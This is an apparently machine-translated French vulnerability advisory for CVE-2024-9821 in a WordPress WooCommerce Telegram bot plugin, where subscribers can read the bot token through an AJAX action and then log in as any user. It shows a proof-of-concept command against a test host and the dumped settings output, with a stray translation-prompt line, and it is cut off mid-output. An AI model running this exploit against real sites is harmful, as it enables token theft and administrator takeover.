
Bot pour Telegram sur WooCommerce <= 1.2.4 - Divulgation authentifiée (Subscriber+) du jeton du bot Telegram menant à un contournement d'authentification
Bot pour Telegram sur WooCommerce <= 1.2.4 - Divulgation du jeton du bot Telegram authentifié (Abonné+) menant à un contournement d'authentification
Le plugin Bot pour Telegram sur WooCommerce pour WordPress est vulnérable à la divulgation d'informations sensibles en raison de l'absence de contrôles d'autorisation sur l'action AJAX 'stm_wpcfto_get_settings' dans toutes les versions jusqu'à la version 1.2.4 incluse. Cela permet à des attaquants authentifiés, avec un accès de niveau abonné ou supérieur, de voir le jeton du bot Telegram, un jeton secret utilisé pour contrôler le bot, qui peut ensuite être utilisé pour se connecter en tant que n'importe quel utilisateur existant sur le site, comme un administrateur, s'ils connaissent le nom d'utilisateur, en raison de la fonctionnalité Login with Telegram.``` Type: plugin CVSS Score: 8.8 CVE: CVE-2024-9821
* Slug: [bot-for-telegram-on-woocommerce](https://wordpress.org/plugin/bot-for-telegram-on-woocommerce)
* Download Link: [Download bot-for-telegram-on-woocommerce Version 1.2.4](https://downloads.wordpress.org/plugin/bot-for-telegram-on-woocommerce.zip)
POC
---```
python3 CVE-2024-9821.py -u http://kubernetes.docker.internal -un user -p user
Please provide the Markdown content to translate.``` Vulnerability check: http://kubernetes.docker.internal Logged in successfully. { 'bot_settings': { 'fields': { 'bftow_bot_api': { 'label': 'Telegram ' 'Bot Token', 'type': 'text', 'value': '8164783304:Axxxxxxxxxxxxxxxxxxxxxxxxxx'}, 'bftow_bot_name': { 'description': 'Set ' 'if ' 'you ' 'want ' 'user ' 'to ' 'get ' 'back ' 'to ' 'Telegram ' 'after ' 'successful ' 'checkout. ' '(Without ' '"@")', 'label': 'Telegram ' 'Bot Name', 'type': 'text', 'value': 'Superbotman'}, 'bftow_buttons': { 'description': 'Save ' 'BOT ' 'Token ' 'first', 'label': 'Activate ' 'API URL', 'type': 'bftow_webhook_activation', 'value': ''}, 'bftow_google_maps_api_key': { 'description': '<a ' 'href="https://developers.google.com/maps/documentation/geocoding/overview">Provide ' 'Google ' 'Maps ' 'API ' 'key ' 'with ' 'enabled ' 'geocoding ' 'API ' 'and ' 'configured ' 'billing ' 'account. ' 'If ' 'you ' 'leave ' 'this ' 'field ' 'empty, ' 'the ' 'location ' 'will ' 'be ' 'taken ' 'via ' 'openstreetmap', 'label': 'Google ' 'Maps ' 'API ' 'key', 'pro': True, 'type': 'text', 'value': ''}, 'bftow_proxy_server': { 'label': 'Proxy ' 'server', 'type': 'text', 'value': 'https://api.telegram.org/bot'}}, 'name': 'BOT API Settings'}, 'interface_settings': { 'fields': { 'bftow_cart_on_site': { 'description': 'if ' 'enabled ' 'and '